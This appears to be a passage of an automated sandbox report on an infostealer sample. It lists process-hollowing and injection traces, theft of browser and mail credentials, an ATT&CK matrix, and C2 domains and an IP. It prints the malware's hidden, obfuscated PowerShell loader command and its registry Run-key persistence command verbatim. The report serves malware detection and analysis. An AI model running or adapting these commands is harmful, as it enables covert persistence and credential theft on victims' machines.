        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314096E mov edx, dword ptr fs:[00000030h]12_2_0314096E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314096E mov eax, dword ptr fs:[00000030h]12_2_0314096E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031889B3 mov esi, dword ptr fs:[00000030h]12_2_031889B3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031889B3 mov eax, dword ptr fs:[00000030h]12_2_031889B3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031889B3 mov eax, dword ptr fs:[00000030h]12_2_031889B3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031009AD mov eax, dword ptr fs:[00000030h]12_2_031009AD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031009AD mov eax, dword ptr fs:[00000030h]12_2_031009AD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031349D0 mov eax, dword ptr fs:[00000030h]12_2_031349D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CA9D3 mov eax, dword ptr fs:[00000030h]12_2_031CA9D3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031969C0 mov eax, dword ptr fs:[00000030h]12_2_031969C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031329F9 mov eax, dword ptr fs:[00000030h]12_2_031329F9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031329F9 mov eax, dword ptr fs:[00000030h]12_2_031329F9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318E9E0 mov eax, dword ptr fs:[00000030h]12_2_0318E9E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318C810 mov eax, dword ptr fs:[00000030h]12_2_0318C810
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A483A mov eax, dword ptr fs:[00000030h]12_2_031A483A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A483A mov eax, dword ptr fs:[00000030h]12_2_031A483A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A830 mov eax, dword ptr fs:[00000030h]12_2_0313A830
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov ecx, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03130854 mov eax, dword ptr fs:[00000030h]12_2_03130854
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03104859 mov eax, dword ptr fs:[00000030h]12_2_03104859
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03104859 mov eax, dword ptr fs:[00000030h]12_2_03104859
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03112840 mov ecx, dword ptr fs:[00000030h]12_2_03112840
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196870 mov eax, dword ptr fs:[00000030h]12_2_03196870
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196870 mov eax, dword ptr fs:[00000030h]12_2_03196870
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtClose: Direct from: 0x76F02B6C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtCreateKey: Direct from: 0x76F02C6C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtSetInformationThread: Direct from: 0x76F02B4C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtOpenSection: Direct from: 0x76F02E0C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtSetInformationThread: Direct from: 0x76EF63F9
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtCreateFile: Direct from: 0x76F02FEC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtOpenFile: Direct from: 0x76F02DCC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtTerminateThread: Direct from: 0x76F02FCC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtCreateMutant: Direct from: 0x76F035CC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtResumeThread: Direct from: 0x76F036AC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtReadFile: Direct from: 0x76F02ADC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtDelayExecution: Direct from: 0x76F02DDC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtResumeThread: Direct from: 0x76F02FBC
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | NtCreateUserProcess: Direct from: 0x76F0371C
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: NULL target: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe protection: read write
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 4348
        Source: C:\Windows\SysWOW64\cmd.exe | Thread APC queued: target process: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Users\user\AppData\Local\Temp\Untapestried.exe base address: 400000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Untapestried.exe base: 1660000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Untapestried.exe base: 19FFF4
        Source: C:\Users\user\Desktop\160420241245287.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Untapestried.exe "C:\Users\user\AppData\Local\Temp\Untapestried.exe"
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "lgplante" /t reg_expand_sz /d "%divergente% -windowstyle minimized $millibar=(get-itemproperty -path 'hkcu:\ciconiform\').syskerne;%divergente% ($millibar)"
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_10001112 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GlobalAlloc,GlobalLock,GetVersionExW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenW,lstrlenW,lstrlenW,lstrcpynW,lstrlenW,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatW,GlobalSize,lstrlenW,lstrcpyW,CharNextW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree, | 0_2_10001112
        Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, | 0_2_00405F0C

        Stealing of Sensitive Information

        Source: Yara match | File source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\cmd.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match | File source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        MITRE ATT&CK Matrix (numbers preceding a technique name are the report's signature counts for that technique)

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 15 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 1 Shared Modules | Logon Script (Windows) | 512 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 221 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | 11 Command and Scripting Interpreter | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 131 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 512 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph ID: 1426828 | Sample: 160420241245287.exe | Startdate: 16/04/2024 | Architecture: WINDOWS | Score: 100
        Network (top level): www.eternalsunrise.xyz; www.n-benriya002.com; 5 other IPs or domains
        Signatures (top level): Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 4 other signatures; Performs DNS queries to domains with low reputation (www.eternalsunrise.xyz)
        Process tree (bracketed numbers are the graph's per-process counts, see legend):
        160420241245287.exe [2 79] started
            dropped: C:\Users\user\AppData\Roaming\...\tailors.ver (DOS); C:\Users\user\AppData\Local\...\nsExec.dll (PE32); C:\Users\user\AppData\...\Randrusianeren.Unf (ASCII)
            signatures: Suspicious powershell command line found
            powershell.exe [20] started
                dropped: C:\Users\user\AppData\...\Untapestried.exe (PE32)
                signatures: Obfuscated command line found; Writes to foreign memory regions; Sample uses process hollowing technique; 3 other signatures
                Untapestried.exe [2 7] started
                    network: 103.14.155.180, 49736, 80 EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK unknown
                    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Maps a DLL or memory area into another process; Hides threads from debuggers
                    bvvgQqxLmFZr.exe injected
                        signatures: Found direct / indirect Syscall (likely to bypass EDR)
                        cmd.exe [13] started
                            signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                            bvvgQqxLmFZr.exe injected
